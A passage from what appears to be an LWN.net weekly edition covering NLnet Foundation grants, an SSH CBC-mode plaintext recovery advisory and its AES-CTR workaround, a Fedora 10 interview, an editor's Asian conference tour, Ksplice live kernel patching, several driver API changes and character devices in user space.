performance differences exhibited by various types of hardware.  The end
result will be a faster, more tightly tuned kernel - and better tbench
numbers too.

		NLnet Foundation seeks projects to fund


A little-known organization—at least outside of its native home in the
Netherlands—has quietly been funding various free software projects
to the tune of roughly €2.5 million a year.  Most of those projects
have been in the Netherlands or Europe, but it is looking to expand
its reach to
the rest of the world.  It is "actively encouraging"
submissions of funding proposals for
projects that involve network technology and will be released as open
source, according to NLnet Foundation Director
Valer Mischenko.


The Foundation grew out of the Netherlands' first internet provider, NLnet,
which laid the original backbone along the rails in that country.  In 1998,
it was 
sold to UUNet and the proceeds were invested in the Foundation.  The
money was intended to fund technology, particularly internet
technology.  Because the internet depends on interoperability, it just
makes sense to require
projects that are funded to release their code, Mischenko says.


The Foundation prides itself on being quick to answer requests for funding
as there are "not too many bureaucratic layers" to the
organization.  Projects that try to get government funding often fall
behind because it takes so much time and effort to get a grant of some
kind—the technology may well have moved on.  Depending on the size of
the project, and the amount of funding required, answers can come as
quickly as just a few weeks.


Each year, two themes are chosen to focus on so that projects in those
areas get priority for funding.  For 2008, those themes are "Identity, 
Privacy, and Presence" and "Open Document Format" (ODF).
While ODF is not directly connected to network technology, the internet
will be a poorer place without open formats that can be freely shared.


Part of the ODF effort was helping governments understand the importance of
open formats in general and ODF in particular.  One of the outcomes of that
work was that all agencies in the Netherlands must start using open formats or
justify why they cannot.


The ODF theme is just one area where the Foundation has broadly interpreted
its mission.  It has helped fund the FSF Europe (FSFE) Freedom Task
Force project for several years.  In addition, it provided €200,000
to help pay for
Eben Moglen's time to work on GPLv3 at the FSF.  Mischenko notes that
it is important for the foundation to fund things that will help
"protect the network"; he and the board see these efforts
as important in that regard.


The bulk of funding this year has gone into the Identity, Privacy, and
Presence theme.  A list of
the currently funded projects has a number of interesting entries from
support for Tor hidden
services and an improved
routing algorithm for GNUnet to
hardware projects such as RFID Guardian and e-Passport.


The current structure of funding is made up of four "layers", each
corresponding to how much the Foundation will provide as well as how long
it will provide funding for.  The first layer is for things like funding trips
for developers and other community members to attend conferences and the
like.  The second layer is for commitments of up to €30,000.
Currently around 15% of proposals for second layer funding are granted.


For larger projects, the third layer can provide 2-4 years of funding of up
to €500,000-600,000 per year.  The fourth layer projects are currently
fixed for the next five years as the Foundation is funding DNSSEC work at
NLnet Labs as well as work on intelligent agents at Vrije
Universiteit Amsterdam. 


Mischenko said that the board is "willing to hear about ideas that
don't fit into the layers".  He said that the Foundation will
continue its current funding model "unless we hear a great
world-changing idea that we put all our money in and then we are
gone".  It is not just projects that can be funded by the
Foundation; any person, company, or organization can apply. "As long as
it is a network technology and it will be put in open source", the
Foundation will consider funding it.


[ Along those lines, the author would like to thank the NLnet Foundation for
helping to fund his recent
trip to the co-located NLUUG autumn
Mobility conference and Embedded Linux
Conference Europe in Ede, the Netherlands. ]

		SSH plaintext recovery vulnerability


A somewhat mysterious SSH
vulnerability has been reported in a way that unfortunately looks a bit
like partial disclosure.  In
this case, though, there is a workaround that is supposed to alleviate the
problem, so there are good reasons—as opposed to publicity-oriented
reasons—to announce the flaw.  While it is difficult to
exploit, it does expose up to 32 bits of
plaintext from within an SSH
session, which is a rather worrisome failure mode.


The flaw has only been confirmed in OpenSSH 4.7p1, but the announcement
indicates that it is likely to be much more widespread: "We expect
any RFC-compliant SSH implementation to be vulnerable 
to some form of the attack."  The flaw is in the design of SSH and
can allow an attacker who has "control over the network"—presumably
the ability to monitor and inject traffic—to recover 32 plaintext
bits with a very low probability (2^-18).  The bits recovered
come from an 
attacker-selected block of ciphertext.  The attack leads to the termination
of the SSH connection, so iterative attacks will be difficult or impossible.


It is hard to get too worked up about that kind of attack, even with many
of the details lacking, but typically these kinds of flaws can be expanded
in various ways.  The announcement mentions variants that recover 14 bits
with a probability of 2^-14.  It also carries the following
warning: "The success probabilities for 
other implementations are unknown (but are potentially much higher)."
It is a security truism that vulnerabilities only get bigger over time,
which we have seen in various contexts, notably in DNS cache poisoning
flaws over the years.


Another bit of information provided by the Centre for the Protection of 
National Infrastructure (CPNI), the UK government agency which issued the
advisory, is that the attack analyzes "the behaviour of the SSH
connection 
when handling certain types of errors".  This particular attack is
also only applicable to the default cipher-block
chaining (CBC) mode, so switching to counter
(CTR) mode works around the flaw.


OpenSSH supports the use of AES in CTR mode, which is what the advisory
recommends using:

	A switch to AES in counter
	mode could most easily be enforced by limiting which encryption
	algorithms are offered during the ciphersuite negotiation that takes
	place as part of the SSH key exchange (see RFC 4253, Section 7.1).
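
In OpenSSH, that restriction can be expressed with the Ciphers option.  The fragment below is a minimal sketch, assuming a stock installation where the server reads /etc/ssh/sshd_config; the same line can be used on the client side in ssh_config or ~/.ssh/config.

```
# Offer only AES in counter mode; CBC-mode ciphers are left out.
Ciphers aes128-ctr,aes192-ctr,aes256-ctr
```

The daemon must reload its configuration before the change takes effect.  Peers without CTR support will then fail to negotiate a cipher at all, so the setting is worth testing before it is deployed widely.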


There is quite a bit of information in the advisory that might lead a
determined attacker in the "right" direction.  It might also provide enough
for someone to come up with attacks that are more probable and/or reveal
more plaintext.  So far, the Internet Storm Center is reporting that they
have not seen any evidence that the flaw is being exploited in the wild.


The OpenSSH project has not, as yet, addressed the issue on its security page.  In
its current form, the flaw probably gives little cause for worry,
but very security-conscious SSH users will want to apply the workaround.


		Interview with Paul Frields


Paul Frields is the Fedora Project Leader and, in the days before the Fedora
10 release, he was giving telephone briefings to the media.  I took
advantage of about an hour of Paul's time to talk about Fedora and the
Fedora 10 release.  The following article is based on that conversation.

To begin with, we talked about Fedora's new Special Interest Group (SIG)
for servers running
Fedora.  Fedora is a fast-paced distribution, and therefore not
suitable for all servers.  There are many places Fedora makes an excellent
server, though.  Those uses include in-house, non-internet-facing
servers or servers with a separate firewall.  It is used in server farms,
on home servers, and in other places where the 13-month life cycle is not a
problem.  The Roadrunner
supercomputer, a hybrid cluster with both IBM PowerXCell and AMD
Opteron processors, runs both Red Hat Enterprise Linux and Fedora.
Roadrunner holds the number 1 spot
in the Top500 list.

Fedora is more than a bleeding edge desktop, although it is good at that.
Fedora sponsors the development of many projects through FedoraHosted.org, and provides many
other contributions to upstream projects.  Extra Packages for Enterprise
Linux (EPEL) is a
community effort by Fedora developers to provide high-quality add-on
packages that complement Red Hat Enterprise Linux and its compatible
spinoffs such as CentOS or Scientific Linux.  Fedora also contributes to
the One Laptop Per Child (OLPC) project.
Fedora does serve many needs.

Among them are the needs of "remixers", the creators of derivative distributions.
The new trademark
guidelines, still in draft form, are designed to spell out the DOs and
DON'Ts of creating a remix.  Remixers can choose packages from the official
Fedora repository, EPEL, RPM Fusion and
other repositories.  Packages can also be built from source, with or
without patches, to create the distribution they want.

Naturally, I asked Paul about the infrastructure/security problems that
were announced
last August.  LWN covered the issue in August and September.  We have yet to see a final
analysis of what happened.  Paul did say that a team of Red Hat engineers
and Fedora volunteers rebuilt everything from scratch, and signed the
packages with new keys.  Beyond that, we were told that the investigation
is ongoing and more information will be available once the investigation is
complete.

Fedora 10 was announced this week, along
with the RPM Fusion and ATrpms repositories, updated for Fedora 10.
Here are some highlights of this release.

With Fedora 9 it became possible to create a persistent USB device, that is,
a key that can be updated, remember settings, and store some data. With
Fedora 10 you have all that, plus you can encrypt your home directory on
the key.

The new NetworkManager
features connection sharing to enable collaboration everywhere.  PackageKit advances the software
management system with its ability to use yum, apt, conary, and other
existing tools.  PackageKit can search for codecs and listen to D-Bus
communications between applications.  Under the long-term roadmap for
PackageKit, this utility will understand what packages you need and will
get them for you.  F10 has faster boot times, kernel mode setting, and
improved virtualization with KVM.

Paul said that the number of Fedora Ambassadors
doubles each year.  The ambassador program is world-wide, with people who
represent the Fedora Project to the wider public, help spread the word
about Fedora, Linux, and Open Source, become a point of contact for local
community members and channel the feedback to the Fedora Project, help recruit
project contributors and think of creative ways for promoting Fedora.

Fedora 10 has more official spins than
ever before.  These are specialized distributions that contain only
packages in the main Fedora repository.  A small sampling includes the
Fedora Electronics Lab (FEL) Spin, Fedora KDE Desktop, Fedora Edu/Math Spin
and Fedora XFCE Desktop.  So check out Fedora 10, or one of the many spins
and remixes that are available.

		The Grumpy Editor's Asian Tour


Your editor, having actually managed to spend a few weeks at home, once
again succumbed to the allure of long-distance travel.  What is life, after
all, without jet lag, economy-class seats, and airline meals?  The excuse
this time was the combination of the Linux Foundation's Japan Linux Symposium
and the Consumer Electronics Linux Forum's Korea
Technical Jamboree.  Both events are intended to increase
communications with the Asian technical community and encourage
participation in the development process.  They are also an opportunity for
developers from other parts of the world to learn more about what their
colleagues are thinking.


This trip was your editor's second Japanese adventure, so it is interesting
to look at what has changed over the intervening 16 months.  The
organization of the event remains about the same, down to the
pizza-and-sushi party at the end of the first day.  The agenda was more
heavily oriented toward filesystems this time around, along with an
overview of control group resource controllers by Hiroyuki Kamezawa.  There
was a big difference, though, in how the discussions went.  Japanese
audiences are notoriously quiet and unwilling to ask questions, but the
attendees at the Japan Linux Symposium have gotten over this constraint.
Questions and discussion abounded - and this is a good thing.  Free
software development does not work well if people are unwilling to ask
questions or raise concerns.  The fact that Japanese developers seem to be
becoming more willing to participate in this way bodes well for their
participation in the process as a whole.

How much are these developers participating now?  Your editor did a quick
and unscientific pass over the changes merged for the 2.6.28 kernel.  It
appears that a full 5% of those patches came from Japanese developers.  If
we exclude the work of one prolific developer who currently lives in Europe, it
can be said that about 4% of 2.6.28 came from Japan itself.  There has been a
distinct increase in the amount of kernel code coming from that part of the
world, and that can only be a good thing.  The Linux Foundation's events in
Japan (which began in the OSDL days and have been occurring regularly for a
few years now) are, perhaps, producing the intended result.

Partly in recognition of the larger role now played by Japan in the free
software community, the Japan Symposium will be taken to a higher level
next year.  The 2009 Kernel Summit will be held in Tokyo in October,
followed by an expanded, three-day Symposium hosting talks by developers
from all over the world.  Planning for this event is just getting underway;
expect the call 
for papers to come out early next year.  It should be an interesting
gathering in a fun city; your editor is already looking
forward to attending.

The Korea Technical Jamboree was a lower-key gathering, held for a single
afternoon on the 25th floor of a Seoul skyscraper.  It lacked some of the
infrastructure of the Japan Symposium (simultaneous translation, for
example), but made up for it in enthusiasm.  Your editor found a
highly-engaged group of developers interested in talking about the
technology.  While much of the discussion was, surprisingly enough, in
Korean, your editor was able to figure out that virtualization is high on
the list of topics that this group was interested in.

There was also talk of business models and more.  What there was less of,
though, was talk of working with the community.  From this brief encounter,
your editor can guess that the Korean community is still working through
the stage of figuring out what it can get from free software.  Developers
there seem to have, for the most part, not yet reached the point of
sharing control of our free operating system and driving it
in directions which better suit their needs.  By their own admission,
Korean developers are a little behind their Japanese counterparts in this
regard, but that situation may not last for long.

One event your editor was not able to attend was FreedomHEC Taipei, held at
the same time.  Harald Welte was there, though, and posted a
brief report:


	I was really happy about FreedomHEC. It is really about time that
	the Linux world and the Taiwan-based chipset vendors and system
	integrators start much more interaction. It is a simple economic
	fact that a lot of hardware development, both in the PC mainboard,
	Laptop as well as the embedded device space happens in Taiwan. It
	is also very true, that for whatever reason the gradual Linux
	revolution in the server and desktop market in the EU, the US and
	other markets such as Southern America has not really reached
	Taiwan.


Harald concludes that a higher Linux awareness in Taiwan should lead to
better hardware support worldwide.  With any luck at all, events like
FreedomHEC, like those in neighboring regions, will help to create that
awareness and expand our global development community.


Your editor was also unable to attend FOSS.in
this year, despite a desire to return to that part of the world.  FOSS.in
is experimenting with a new event plan which is strongly oriented toward
the production of tangible results; it has clearly been influenced by the
success of the Linux Plumbers Conference.  India has vast numbers of
capable developers, relatively few of whom actively participate in our
community now. 
That number has been growing, though, and events like FOSS.in have a lot to
do with that change.


Finally: while your editor saw a lot of people expressing enthusiasm
for Linux, many of them seemed to be doing it with Windows laptops.  It
seems that the value of Linux has not yet made itself felt in the desktop
setting, even among those whose job it is to develop for or promote Linux.
It would be interesting to know why more of this work can't move off of
proprietary platforms.


Some of the answer may be related to episodes like this: your editor had
rashly upgraded his laptop to a new stable distribution release (we'll call
it Incredibly Irritating for the purposes of this discussion) just prior to
traveling.  The
obligatory check to ensure that video projection still worked got forgotten
this time; it had always worked before, what could go wrong this time?  But
it seems that this "upgrade" moved the tools needed to interface with
RandR into a separate package, which it did not bother to install.  So it
was not possible to tell the laptop to send video out the external port.


Suffice it to say that, five minutes prior to giving a talk, while
disconnected from the network, one does not want to hear "you need to
install this package before I'll turn on your external video port" from
one's computer.  Your editor will accept the blame for not having verified
this functionality before traveling, but, still: things like this should
Just Work, especially with a distribution which claims to have invested
much energy into making such things Just Work.  The presenters using
Windows laptops were not having to contend with this kind of challenge.


That little glitch notwithstanding, this trip was a big success.  The
hospitality was amazing, interest was high, and there is always value in
seeing how other groups are approaching free software.  Our community
continues to grow; many good things will come from that.

		Ksplice and kreplace


Rebooting a system to apply a security update is a pain.  In some
situations, it's more than a pain; for various reasons, many systems cannot
be taken down at all without compromising the work they are supposed to be
doing.  Back in April, LWN looked
at Ksplice, a mechanism designed to enable the installation of kernel
updates without the need to reboot the system.  Since then, work has
continued on Ksplice, a new
version has been posted, and the project is starting to push toward
mainline inclusion.  So another look is called for.

The core idea behind Ksplice remains the same: when given a source tree and
a patch, it builds the kernel both with and without the patch and looks at
the differences.  To that end, the compilation procedure is modified to
put every function and data structure into its own executable section.
That makes life a little harder for the compiler and the linker, but
developers are notably insensitive to the difficulties faced by those
tools.  With things split up this way, it is relatively easy to identify a
minimal set of changes in the binary kernel image which result from the
patch.  Ksplice can then, with some care, patch the new code into the
running kernel.  Once this work is done, the old kernel is running the new
code without ever having been rebooted.
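
The comparison step described above can be pictured with a small toy model. This is only a sketch in Python, not Ksplice's actual code: it assumes each build is represented as a mapping from section name to the bytes emitted for that section, and the section names and byte strings are invented for illustration. The real tool must also deal with relocations and symbol resolution, which are ignored here.

```python
def changed_sections(pre, post):
    """Return the sorted names of sections that differ between two builds.

    `pre` and `post` map a section name (one per function or data
    structure) to the bytes the compiler emitted for that section.
    """
    names = set(pre) | set(post)
    return sorted(n for n in names if pre.get(n) != post.get(n))


# Hypothetical object-code contents for two builds of the same tree.
pre_build = {
    ".text.vma_setup": b"\x55\x89\xe5\x90",
    ".text.do_read": b"\x31\xc0\xc3",
    ".data.limits": b"\x10\x00",
}
post_build = dict(pre_build)
post_build[".text.vma_setup"] = b"\x55\x89\xe5\x0d\x90"  # the patched function

print(changed_sections(pre_build, post_build))
```

Because every function lives in its own section, a one-function patch shows up as a single changed entry rather than as a shift in one large block of text.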

This technique works well for code changes, but different challenges come
with changes to data structures.  Back in April, Ksplice could not handle
that kind of change.  Even so, the project's developers claimed to be able
to apply the bulk of the kernel's security updates using Ksplice.  Since
then, though, the developers have applied some energy to this problem.
With the addition of a couple of new techniques - which require extra
effort on the part of the person preparing the patch for Ksplice - it is
now possible to apply 100% of the 65 non-DoS security patches released for
the kernel since 2005.

In some cases, a kernel patch will simply require that a data structure be
initialized differently.  The way to handle this change in an update
through Ksplice is to modify the relevant data structures on the fly.  To
effect such changes, a patch can be modified to pass a function (call it
func) to ksplice_apply().


While Ksplice is applying the changes - and while the rest of the system is
still stopped - the given func will be called.  It can then go
rooting through the kernel's data structures, changing things as needed.
For example, CVE-2008-0007
came about as a result of a failure by some drivers to set the
VM_DONTEXPAND flag on certain vm_area_struct structures.
Ksplice is able to apply the fix to the drivers without trouble, but that
is not helpful for any incorrectly-initialized VMAs present on the running
system.  So the
modifications to the patch add some functions which set
VM_DONTEXPAND on existing VMAs, then use ksplice_apply()
to cause those functions to be executed.  The result is a fully-fixed
system.

Changes to data structure definitions are harder.  If a structure field is
removed, the Ksplice version of the patch can just leave it in place.  But
the addition of a new field requires more complicated measures.  Simply
replacing the allocated structures on the fly seems impractical; finding
and fixing all pointers to those structures would be difficult at best.  So
something else is needed.

For Ksplice, that something else is a "shadow" mechanism which allocates a
separate structure to hold the new fields.  Using shadow structures is a
fair amount of additional work; the original patch must be changed in a
number of places.  Code which allocates the affected structure must be
modified to allocate the shadow as well, and code which frees the structure
must be changed in similar ways.  Any reference to the new field(s) must,
instead, look up the shadow structure and use that version of the field.
All told, it looks like a tiresome procedure which has a significant chance
of introducing new bugs.  There is also the potential for performance
issues caused by the linear linked list search performed to find the shadow
structures.  The good news is that it is only rarely necessary to modify a
patch in this way.
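
As a rough illustration of the shadow idea, here is a toy model in Python. It is a sketch under stated assumptions, not the Ksplice interface: the ShadowTable and Connection names, the attach/lookup/detach methods, and the "retries" field are all hypothetical. The model keeps the new fields in a separate record found by a linear search, as the text describes.

```python
class ShadowTable:
    """Holds fields added by a patch, stored beside the original objects."""

    def __init__(self):
        self._entries = []  # list of (object, shadow dict) pairs

    def attach(self, obj, **fields):
        """Call wherever the patched code allocates `obj`."""
        shadow = dict(fields)
        self._entries.append((obj, shadow))
        return shadow

    def lookup(self, obj):
        """Linear search for the shadow of `obj`; None if it has none."""
        for candidate, shadow in self._entries:
            if candidate is obj:
                return shadow
        return None

    def detach(self, obj):
        """Call wherever the patched code frees `obj`."""
        self._entries = [(o, s) for o, s in self._entries if o is not obj]


class Connection:
    """Stand-in for a structure whose layout cannot change at run time."""

    def __init__(self, peer):
        self.peer = peer


shadows = ShadowTable()
old = Connection("10.0.0.1")   # existed before the update: no shadow here
new = Connection("10.0.0.2")   # allocated by patched code
shadows.attach(new, retries=0)

# Every use of the new field goes through a lookup instead of `new.retries`.
shadows.lookup(new)["retries"] += 1
print(shadows.lookup(new), shadows.lookup(old))
```

In this model, any code touching the new field must cope with a failed lookup for objects that predate the update, which hints at why the procedure is tiresome and easy to get wrong.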

The Ksplice developers do not appear to be done yet; from the latest patch
posting:


	We're currently working on the problem of making it feasible to
	apply the entire stable tree using Ksplice.  Although Ksplice's
	original evaluation focused on patches for CVEs, we understand the
	idea that "security bugs are just 'normal bugs'"  (i.e.,
	tracking security bugs separately from normal bugs can be difficult
	and isn't necessarily advisable).  We ultimately want to provide to
	long-running machines hot updates for all of the bug fixes that go
	into the corresponding stable tree.


This is an ambitious goal; a single stable series can add up to hundreds of
changes, some of which can be reasonably large.  It will be interesting to
see how many users are really interested in this particular sort of update;
sites running critical systems tend to have older "enterprise" kernels
which are no longer receiving stable tree updates.  But a Ksplice which is
flexible enough to handle that kind of update stream should also be useful
for distributors wanting to provide no-reboot patches to their customers.

Meanwhile, Nikanth Karthikesan has posted a facility called kreplace.  On the surface, it
looks similar to Ksplice, but the goal is a little different: its purpose
is to allow a developer to quickly try out a change on a running kernel.
Kreplace works by simply patching out and replacing one or more functions
in the kernel.  Kreplace may have its value, but the initial reaction has
not been greatly enthusiastic.  Among other things, it has been pointed out that Ksplice also has a facility
to allow for quick experimentation with changes - though it will be quick
only if the developer is already set up to use Ksplice with the running
kernel.

A final concern with either of these solutions is that they are, for all
practical purposes, employing rootkit techniques.  A mechanism which can be
used by distributors to patch running systems can also be (mis)used by others.
Vendors of binary-only modules could, for example, use Ksplice or kreplace
to get around GPL-only exports and other inconvenient features of
contemporary kernels.  Crackers could also use it, of course, but they
already have their own rootkit tools and gain no real benefit from an
officially-supported runtime patching mechanism.  Whether this aspect of
Ksplice is of concern to the development community may be seen in the
coming months as this code gets closer to mainline inclusion.

		Driver API: sleeping poll(), exclusive I/O memory, and DMA API debugging


There are currently a number of proposed driver API changes being discussed
on the lists.  None of them are major, but they are worth being aware of.

poll()

Most of the functions in the file_operations structure are
concerned with I/O.  So it is not surprising that these functions are
allowed to sleep.  Except that, as it turns out, one of them -
poll() - cannot.  There is nothing inherent in the poll()
or select() system calls which would require the driver
poll() callback to be nonblocking; this requirement is, instead, a
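result of the implementation.  In essence, the core poll()
implementation is a loop: it puts the task into the TASK_INTERRUPTIBLE
state, calls the poll() callback for each file descriptor, and, if nothing
is ready, calls schedule_timeout_range() to sleep until something happens.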


The problem is relatively straightforward: if a specific driver chooses to
sleep in its poll() callback, the current task state will get set
back to TASK_RUNNING and schedule_timeout_range() will return
immediately.  So a sleeping driver turns the main loop into a busy-wait.

The solution, as developed by
Tejun Heo, is also straightforward.  His patch causes
sys_poll() to define a custom wakeup function which, in turn, sets
a new triggered flag when called.  That eliminates the need to put
the process into TASK_INTERRUPTIBLE for the duration of the main
loop; that can be done, instead, right before actually sleeping.
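
The difference between the two loops can be seen in a toy simulation. The Python below is only a model of the behavior described above, not kernel code: the Waiter class, its counters, and the function names are invented for illustration, and the "scheduler" simply counts whether a call would have slept or returned at once.

```python
RUNNING, INTERRUPTIBLE = "TASK_RUNNING", "TASK_INTERRUPTIBLE"


class Waiter:
    """Toy stand-in for the task calling poll()."""

    def __init__(self):
        self.state = RUNNING
        self.triggered = False
        self.sleeps = 0   # times the task really gave up the CPU
        self.spins = 0    # times the scheduler call returned immediately

    def schedule_timeout(self):
        # A task that is still runnable does not actually go to sleep.
        if self.state == RUNNING:
            self.spins += 1
        else:
            self.sleeps += 1
            self.state = RUNNING   # woken by a timeout or an event

    def wakeup(self):
        # Models the custom wakeup function from the patch.
        self.triggered = True
        self.state = RUNNING


def sleeping_poll_callback(task):
    # A driver that blocks inside poll() comes back in TASK_RUNNING.
    task.state = RUNNING
    return False                   # nothing is ready yet


def old_poll_loop(task, callback, iterations):
    for _ in range(iterations):
        task.state = INTERRUPTIBLE     # set before calling the driver
        if callback(task):
            break
        task.schedule_timeout()
    task.state = RUNNING


def new_poll_loop(task, callback, iterations):
    for _ in range(iterations):
        if callback(task):
            break
        task.state = INTERRUPTIBLE     # set only right before sleeping
        if not task.triggered:
            task.schedule_timeout()
        task.triggered = False
        task.state = RUNNING


old, new = Waiter(), Waiter()
old_poll_loop(old, sleeping_poll_callback, 5)
new_poll_loop(new, sleeping_poll_callback, 5)
print("old loop:", old.spins, "spins,", old.sleeps, "sleeps")
print("new loop:", new.spins, "spins,", new.sleeps, "sleeps")
```

With a sleeping callback, the old loop never manages to sleep, while the new loop sleeps on every pass. The triggered flag keeps a wakeup that arrives during polling from being lost.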

Most driver writers can remain unaware of this change, which looks highly
likely to be merged for 2.6.29.  But, for those who need it, there will be
one more degree of flexibility in the implementation of poll()
callbacks.

Exclusive I/O memory

For a while, developers involved in the hunt for the e1000e corruption
bug thought that the X server might be the problem.  The real bug
turned out to be elsewhere, but the suspicion cast upon X led to the
development of a new API designed to make it harder for user-space programs
to interfere with the operation of an in-kernel driver.  

In particular, it seemed sensible to prevent user space from manipulating
I/O memory which has been allocated by device drivers.  This can be
achieved by not allowing an mmap() call on /dev/mem to
map regions already given to drivers.  If the STRICT_DEVMEM
configuration option is set, the kernel will protect its own memory from
mapping by user space; protecting I/O memory is really just a matter of
extending that mechanism.

Arjan van de Ven has implemented that feature in his MMIO exclusivity patch.  He
chose, however, not to make this protection the default.  Instead, drivers
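which want exclusive access to an I/O memory region should call one of
three new functions: pci_request_region_exclusive(),
pci_request_regions_exclusive(), or
pci_request_selected_regions_exclusive().

There is also a new, low-level allocation macro:
request_mem_region_exclusive().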


In each case, these functions are equivalent to their non-exclusive
cousins, except for the changed name and the resulting exclusive
allocation.

There may be cases where a developer wants to be able to map a region from
user space on a development system, regardless of what the driver thinks.
For such situations, there is a new iomem=relaxed boot parameter.
When relaxed is selected, exclusive allocations are not enforced.
Clearly this is not an option which one would want to set on a production
system, but it may be useful in development environments.
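
The policy can be summarized with a small model. This Python sketch is not the kernel's resource code; the IomemMap class, its methods, and the addresses are hypothetical, and it assumes the strict /dev/mem checks are already enabled. It shows only the decision described above: exclusive regions refuse user-space mappings unless the relaxed option is in effect.

```python
class IomemMap:
    """Toy resource table: which physical ranges drivers have claimed."""

    def __init__(self, relaxed=False):
        self.relaxed = relaxed   # models booting with iomem=relaxed
        self.regions = []        # (start, end, name, exclusive)

    def request_region(self, start, length, name, exclusive=False):
        end = start + length - 1
        for s, e, _, _ in self.regions:
            if start <= e and s <= end:
                return False     # overlaps an existing claim
        self.regions.append((start, end, name, exclusive))
        return True

    def may_mmap(self, start, length):
        """Would a user-space mapping of this range be allowed?"""
        if self.relaxed:
            return True
        end = start + length - 1
        return not any(excl and start <= e and s <= end
                       for s, e, _, excl in self.regions)


iomem = IomemMap()
iomem.request_region(0xfebc0000, 0x20000, "nic", exclusive=True)
iomem.request_region(0xfd000000, 0x1000000, "framebuffer")

print(iomem.may_mmap(0xfebc1000, 0x1000))   # inside the exclusive region
print(iomem.may_mmap(0xfd000000, 0x1000))   # inside the ordinary region
```

Keeping exclusivity as an opt-in flag on each request, as in this model, matches the choice not to make the protection the default.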


DMA API debugging

The last topic is not actually an API change, but it's worth a look
anyway.  The kernel provides a nice API for setting up DMA operations.  In
many cases, the associated functions do little or no work; the system they
are running on does not require any additional effort.  The result is that
a lot of "tested" driver code may, in fact, have serious errors in its use
of the DMA API.  When those drivers are run on a different system - one
with an I/O memory management unit (IOMMU) in particular - those errors
could lead to no end of unpleasant behavior.

Kernel developers like the idea of finding bugs before they bite users on
remote systems.  To help make that happen with the DMA API, Joerg Roedel
has posted a new DMA API
debugging facility.  This feature, when built into the kernel, should
make it possible to find a number of previously-hidden bugs in device
drivers.  It has, in fact, already turned up a few problems with in-tree
drivers, mostly in the networking subsystem.

Use of this facility simply requires enabling a configuration option; the
API itself does not change.  Once it's enabled, this code will check for a
number of problems, including freeing DMA buffers with a different size
than was given at allocation time, freeing buffers which were never
allocated at all, mixing coherent and non-coherent functions on the same
buffer, confusion over I/O directions, and more.  Each of these problems
might slip by on a developer's test system, but might create havoc where an
IOMMU is being used.  When a problem is found, a warning and stack
traceback are logged.
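
To make the kinds of checks concrete, here is a toy tracker in Python. It is a sketch of the idea only and does not reflect how the posted facility is implemented: the DmaDebug class, its method names, and the warning texts are invented, and the real code logs a stack traceback where this model merely records a string.

```python
class DmaDebug:
    """Toy tracker for DMA mappings, in the spirit of the checks above."""

    def __init__(self):
        self.mappings = {}   # DMA address -> (size, direction, coherent)
        self.warnings = []

    def map(self, addr, size, direction, coherent=False):
        self.mappings[addr] = (size, direction, coherent)

    def unmap(self, addr, size, direction, coherent=False):
        entry = self.mappings.pop(addr, None)
        if entry is None:
            self.warnings.append(f"{addr:#x}: freeing a buffer that was never mapped")
            return
        m_size, m_dir, m_coherent = entry
        if size != m_size:
            self.warnings.append(f"{addr:#x}: mapped with size {m_size}, freed with {size}")
        if direction != m_dir:
            self.warnings.append(f"{addr:#x}: mapped {m_dir}, freed {direction}")
        if coherent != m_coherent:
            self.warnings.append(f"{addr:#x}: coherent and non-coherent calls mixed")


dbg = DmaDebug()
dbg.map(0x1000, 4096, "to_device")
dbg.unmap(0x1000, 2048, "to_device")     # wrong size
dbg.unmap(0x2000, 512, "from_device")    # never mapped
dbg.map(0x3000, 256, "to_device")
dbg.unmap(0x3000, 256, "from_device")    # wrong direction

for warning in dbg.warnings:
    print(warning)
```

None of these mistakes would cause visible trouble on a system where the DMA functions do little or no work, which is why bookkeeping of this sort is useful on a developer's machine.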

The response to this facility has been positive.  The biggest complaint seems to
be about the fact that it is implemented as an x86-specific feature.
So it will probably have to be made generic before merging - after all,
developers on other platforms are entirely capable of introducing
DMA-related bugs too.  Once it goes in, this feature should probably be
enabled on any system used for driver development.

		Character devices in user space


There is a lot of functionality (things like filesystems and device
drivers) that is normally considered to be a kernel task but has,
over time, been allowed to move into user space.  The UIO user space driver framework
came along in 2.6.23, while filesystems in user space (FUSE) have been
around since 2.6.14.  Tejun Heo would like to see this idea broadened even
further with the character
devices in user space (CUSE) patches.


At first blush, the uses for a character device implemented in user space
are not obvious.  Looking a bit deeper, though, one finds numerous
programs—both open and closed source—that rely on legacy
character drivers.  Those drivers are currently in the kernel, but need not
be if there were a way to implement them in user space.  In addition,
older, deprecated interfaces, such as Open Sound System (OSS) can be better
supported without constantly fiddling with the in-kernel emulation.

Providing better OSS support is one of the prime motivators for CUSE, as
Heo announced in a linux-kernel posting
introducing the OSS
proxy.  The proxy uses CUSE to implement the /dev/dsp,
/dev/adsp, and /dev/mixer devices that programs using OSS
expect.  Adrian Bunk didn't necessarily see
this as a good thing:


	Sorry for being destructive, but 6 years after ALSA went into the
	kernel we are slightly approaching the point where all applications
	support ALSA.  The application you list on your webpage is UML host
	sound support, and I'm wondering why you don't fix that instead of
	working on a better OSS emulation?


But Heo sees the current state of OSS emulation as a rather complicated
mess that, for better or worse, needs cleaning
up: 

We now have in-kernel OSS emulation which can't mux with other streams,
aoss [ALSA OSS emulation] with its own supported and broken list and can
also be routed 
through PA [PulseAudio] by configuring ALSA right and then padsp [PA OSS
emulation] with its own
supported and broken list and nothing works good enough.  So, if we have
one thing which just works, we can in time put all those to rest.


But there are other uses for CUSE too.  Greg Kroah-Hartman notes that legacy 
software for talking to Palm Pilots, much of which is binary-only, expects
to talk to a /dev/pilot serial port.  The kernel carries around a
driver, but "a libusb userspace program can handle all of the data to
the USB device instead".  So CUSE could be used to eventually remove
another crufty driver from the kernel, while still maintaining
compatibility with old user space code.


CUSE is implemented on top of FUSE as there is a fair amount of overlap
between them.  Character devices and filesystems implement many of the same
file operations—things like open(), close(),
read(), and write()—which makes them a good match.
Heo has a separate patchset for
FUSE that implements additional operations for filesystems, some of
which will be used by CUSE.


The additional FUSE operations include an implementation of
ioctl() that is necessarily rather ugly.  Because an
ioctl implementation can access memory in unpredictable
ways—and those data structures can be arbitrarily deep—there
needs to be a mechanism for user-space CUSE devices to read and write that
memory.  The CUSE server does not have direct access to the caller's
memory, so a multi-step
ioctl() with retries must be implemented.  This particular bit of
ugliness is only allowed for in-kernel use, so that CUSE (or other
things like it) can allow "unrestricted" ioctl() implementations.
All FUSE filesystems are still required to have "restricted"
ioctls where the kernel can determine the direction and amount of
data that is transferred.
poll() support has also been added to FUSE, which, in turn,
requires a separate patch that allows poll() callbacks to sleep
(described in this article).
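
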